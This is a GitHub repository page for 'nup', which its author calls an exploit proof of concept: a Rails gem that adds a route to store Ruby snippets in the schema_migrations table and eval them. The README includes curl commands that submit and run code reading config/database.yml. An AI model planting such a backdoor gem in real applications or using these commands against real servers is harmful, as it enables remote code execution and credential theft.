Skip to content
/ nup Public

An exploit POC that shoehorns/evals code snippets in the schema_migrations table.

License

MIT license
0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

geoffroh/nup

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
app
app
 
 
bin
bin
 
 
config
config
 
 
lib
lib
 
 
test
test
 
 
.gitignore
.gitignore
 
 
Gemfile
Gemfile
 
 
Gemfile.lock
Gemfile.lock
 
 
MIT-LICENSE
MIT-LICENSE
 
 
README.rdoc
README.rdoc
 
 
Rakefile
Rakefile
 
 
nup.gemspec
nup.gemspec
 
 

Repository files navigation

Nup

A proof of concept gem that shoehorns strings into the schema_migrations table, and adds a route and controller to save strings to the db and eval them in ruby.

example usage:

“‘ rails new blog cd blog echo “gem ’nup’, github: ‘[email protected]:geoffroh/nup.git’” >> Gemfile bundle

# POST the code snippet to the indexes route, snippet id is returned curl -d “index=File.read("config/database.yml")” localhost:3000/indexes > 1 # GET the indexes/:id to eval the snippet and return the result, # in this case displaying the database.yml file. curl localhost:3000/indexes/1 > # SQLite version 3.x

...

“‘

About

An exploit POC that shoehorns/evals code snippets in the schema_migrations table.

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages